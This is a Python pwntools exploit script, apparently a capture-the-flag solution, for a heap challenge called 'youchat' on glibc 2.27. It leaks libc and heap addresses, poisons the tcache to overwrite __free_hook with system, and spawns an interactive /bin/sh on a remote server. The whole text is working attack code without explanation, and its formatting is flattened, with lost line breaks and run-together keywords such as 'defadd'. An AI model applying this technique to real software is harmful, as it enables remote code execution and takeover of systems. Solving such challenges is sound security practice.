from pwn import * p = process("./youchat",env = {"LD_PRELOAD":"./libc-2.27.so"}) libc = ELF("./libc-2.27.so") p = remote("124.70.158.59","30023") defadd(idx,size,name,password): p.recvuntil("Your choice: ") p.sendline("1") p.recvuntil("Index: ") p.sendline(str(idx)) p.recvuntil("How long is your user id: ") p.sendline(str(size)) p.recvuntil("User name: ") p.send(name) p.recvuntil("Password: ") p.send(password) deffree(idx): p.recvuntil("Your choice: ") p.sendline("2") p.recvuntil("Index: ") p.sendline(str(idx)) defedit(idx,name): p.recvuntil("Your choice: ") p.sendline("3") p.recvuntil("Index: ") p.sendline(str(idx)) p.recvuntil("New username: ") p.sendline(name) defshow(idx): p.recvuntil("Your choice: ") p.sendline("4") p.recvuntil("Index: ") p.sendline(str(idx))
add(0,0x100,'a','a'*0x10)#0 over write for i in range(1,0x9): add(i,0xf8,'a','a') for i in range(0x8): free(0x8-i) for i in range(1,0x8): add(i,0xf8,'a','a') add(8,0xf8,'a'*8,'a') show(8) p.recvuntil('a'*8) libc.address = u64(p.recv(6)+'\x00\x00')-0x3EBCA0 print hex(libc.address) show(3) p.recvuntil("Username: ") heap = u64(p.recv(6)+'\x00\x00')-0x12461 print hex(heap) edit(0,p64(0)*13+p64(0x31)+p64(0)*2+p64(libc.sym['__free_hook'])) print hex(libc.sym['__free_hook']) edit(0,p64(libc.sym['system'])) add(0xf,0xf8,'/bin/sh','a') free(0xf) #gdb.attach(p,'b *$rebase(0x1876)') p.interactive()